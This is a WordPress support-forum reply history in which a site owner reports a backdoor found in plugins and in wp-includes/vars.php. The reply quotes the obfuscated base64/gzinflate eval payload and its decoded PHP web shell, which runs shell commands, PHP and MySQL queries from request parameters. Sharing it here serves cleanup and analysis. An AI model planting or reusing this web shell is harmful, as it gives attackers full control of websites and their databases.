mbroyles
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Can’t post/edit: requesting authentication “magic”code was also found in the file:
wp-includes/vars.php
removed the malicious code from the top of the file and no longer see the ‘Magic’ login prompt.
Forum: Fixing WordPress
In reply to: Can’t post/edit: requesting authentication “magic”The following code was found on my clients WP site in two separate plug-ins. Code was found at the top of each page (when you click the edit link for the plugin).
eval(gzinflate(base64_decode('1VVtT9swEP7c/gpTVSSRukGrMhgF1gk6aRL7AIwPCCbjJhfqLW/YzkoH/e87Oy9NCUPAJqRVbZr4Od89z53v0rxtNrhP7BU/jVzF44jCDZdK2hY1H8l8kBMIAstxmg00bhSG5J6B3f4Rh6lyiDZqDHnEqQCpYgF2SxvRMPag5QzqaJxARMdMgsdFbtD2uGTjAGgRTZJdwoRgMxqyxLaU4KHVIXCTBOjVtjr4oH1egbKt2l7knrk1SiFM1IwUdHO+BqrlIGFSqolILYesrpIVHlHDoQJ0SJ1q6bOxtjYk8ZhKxYSyMwoonhS7Cw6DwrqNOUGhZhNKoW4cKYiQycLEYBB51A2ARQUwN1cIJDyoQ86kgrCmIl9+kYZs7+sp0EcMn8Ctq1hAjyspuS123OMP7iQm2uxJnB5k8wQeQ1IJ3THxCgI5xe8xj+zWRdRaRkt6HaLBh0gOCZe6s+JUuGC3faM30R1Wxmthk1XLm8ds5f4a0wkPAPtkSHyIffSxMC6s32qvvgDmIdwh3fVev+BoSNo1tIDnZQ+4QSw1w1r9zc1yyS5vM/Lzy0cKpS/4m+NSNtO4lKCw0enx6Oh0dPL13EomCd3wun1vi3U3e5v9dX9zfWurv9Fj7tjbeLfudt/3rG+5XhOjtfOUPTrjaaD28qLo4M+OSnZ3iQU/GU7aLN363tY9FLIr7tLrNFYg6VXi2g65uyM1RKSR4iEg+oFIHJCJDBiedFml4oYe6iPbpLY2yLJnKkD+QkDWE0bA/RfE/6blOgUxK8S0sxLjYQxn8jqgBnw1STgHpok3frPnjSeVV1lOymmWHZMd2mecWfrl7OTokGKw4zP66ePnw9HBNsG5k6kEIWJhV2JXJ4/HUc2AFL23SPfSCMopVjjmTZ0NzLz986HTFvG0TLEPyp1QfFfG7rKb6nQ4x1oRvS2fBNlf7kAA5DJLB4NFmiQIzgL+KyPpVEUtafpX2T053d8fjQ6WEsx8H1wFHkUFeBSm40qiiV4jhcWf0m4UZ8Quop21F4yrQjJ6wu9v'))); ?>I expanded the eval code. Here is what it expanded to:
{ if (!function_exists('______safeshell')) { function ______safeshell($komut) { @ini_restore("safe_mode"); @ini_restore("open_basedir"); $disable_functions = array_map('trim', explode(',', ini_get('disable_functions'))); if (!empty ($komut)) { if (function_exists('passthru') && !in_array('passthru', $disable_functions)) { //@ ob_start(); @ passthru($komut); //$res = @ ob_get_contents(); //@ ob_end_clean(); } elseif (function_exists('system') && !in_array('system', $disable_functions)) { //@ ob_start(); @ system($komut); //$res = @ ob_get_contents(); //@ ob_end_clean(); } elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) { $res = @ shell_exec($komut); echo $res; } elseif (function_exists('exec') && !in_array('exec', $disable_functions)) { @ exec($komut, $res); $res = join("\n", $res); echo $res, "\n"; } elseif (@ is_resource($f = @ popen($komut, "r"))) { //$res = ""; while (!@ feof($f)) { //$res .= @ fread($f, 1024); echo(@ fread($f, 1024)); } @ pclose($f); } else { $res = <code>{$komut}</code>; echo $res; } } } }; if (isset ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'])) { echo "<php_5d14d8a172740f7088452acbd560c192_result>\n"; if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'eval') { eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']); } else if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'exec') { ______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']); } else if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'query') { $result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh); if (!$result) { echo "php_5d14d8a172740f7088452acbd560c192_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n"; die(); } else if (is_resource($result)) { $res = array(); while ($row = mysql_fetch_assoc($result)) { $res[] = $row; }; mysql_free_result($result); echo serialize($res); die(); } else { echo "php_5d14d8a172740f7088452acbd560c192_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n"; die(); } }; echo "\n</php_5d14d8a172740f7088452acbd560c192_result>\n"; die(); }; };Looks like it gives the ability to run shell commands and mysql DB queries via remote POST and GET requests.